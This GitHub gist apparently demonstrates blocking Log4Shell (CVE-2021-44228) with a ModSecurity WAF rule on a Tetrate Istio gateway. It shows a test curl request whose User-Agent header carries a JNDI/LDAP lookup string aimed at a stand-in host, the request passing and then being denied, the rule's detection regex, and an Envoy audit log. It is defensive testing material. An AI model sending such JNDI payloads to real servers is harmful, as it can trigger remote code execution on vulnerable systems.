Gist incfly/83280d041c8d2928d5e15403f4b9b86e, last active January 5, 2022 07:58
```console
# Single quotes keep the shell from expanding the ${...} test string.
# --resolve takes host:port:address; port 80 matches the plain-HTTP URL.
# -v prints the response headers shown below.
$ curl -v -H 'Host: httpbin.tetrate.com' -H 'User-Agent: ${JNDI://ldap://evial.xx/path}' \
    --resolve "httpbin.tetrate.com:80:${GATEWAY_IP}" httpbin.tetrate.com/headers
< HTTP/1.1 200 OK
< server: envoy
< date: Tue, 28 Dec 2021 05:48:57 GMT
< content-type: application/json
< content-length: 28
< access-control-allow-origin: *
< access-control-allow-credentials: true
< x-envoy-upstream-service-time: 25
<
{
  "origin": "127.0.0.1"
}
```
```sh
kubectl apply -f https://raw.githubusercontent.com/istio/istio/master/samples/httpbin/httpbin.yaml
tctl apply -f ./ingress.yaml
```
```sh
kubectl apply -f ./waf.yaml
```
```yaml
apiVersion: security.tsb.tetrate.io/v2
kind: Group
metadata:
  name: t1
  workspace: w1
  tenant: mycompany
  organization: myorg
spec:
  namespaceSelector:
    names:
      - "*/default"
  configMode: BRIDGED
---
apiVersion: security.tsb.tetrate.io/v2
kind: SecuritySetting
metadata:
  name: defaults
  group: t1
  workspace: w1
  tenant: mycompany
  organization: myorg
spec:
  wafSettings:
    ruleSets:
      - block-log4j
```
```yaml
apiVersion: security.tsb.tetrate.io/v2
kind: WafRuleset
metadata:
  name: block-log4j
  organization: myorg
spec:
  displayName: "Block Log4j Shell Attack"
  description: "Block traffic containing the special substring that can lead to a remote execution attack."
  # ModSecurity rule: deny with 403 when any inspected variable contains the literal ${jndi:
  ruleSet: |
    SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML://*|XML://@* \
      "@rx \${jndi:" \
      "phase:4,id:9455,deny,status:403,msg:'Potential Remote Command Execution: Log4j CVE-2021-44228'"
```
```console
# Same request as before, sent after the WAF rule set is applied.
$ curl -v -H 'Host: httpbin.tetrate.com' -H 'User-Agent: ${JNDI://ldap://evial.xx/path}' \
    --resolve "httpbin.tetrate.com:80:${GATEWAY_IP}" httpbin.tetrate.com/headers
< HTTP/1.1 403 Forbidden
< date: Tue, 28 Dec 2021 04:42:26 GMT
< server: envoy
< content-length: 0
< x-envoy-upstream-service-time: 29
<
* Connection #0 to host httpbin left intact.
```
```text
2021-12-28T04:42:26.357217Z error envoy wasm wasm log: [extensions/modsecurity/plugin.cc:563]::doDisruptiveAction()
[audit log][client 10.60.0.16] ModSecurity: Access denied with code 403 (phase 4).
Matched "Operator `Rx' with parameter `jndi' against variable `REQUEST_HEADERS:foo' (Value: `jndi' )
[file "<<reference missing or not informed>>"] [line "9"] [id "9455"] [rev ""]
[msg "Potential Remote Command Execution: Log4j CVE-2021-44228"]
[data ""] [severity "0"] [ver ""] [maturity "0"] [accuracy "0"] [hostname "10.60.2.158"]
[uri "/ip"] [unique_id "1640666546"] [ref "o0,4v90,4"]
```
```yaml
apiVersion: gateway.tsb.tetrate.io/v2
kind: IngressGateway
metadata:
  organization: tetrate
  name: httpbin-gw-ingress
  group: httpbin-gw
  workspace: httpbin-ws
  tenant: tetrate
spec:
  workloadSelector:
    namespace: default
    labels:
      app: tsb-gateway-httpbin
  http:
    - name: httpbin
      port: 8000
      hostname: "httpbin.tetrate.com"
      routing:
        rules:
          - route:
              host: "default/httpbin.default.svc.cluster.local"
```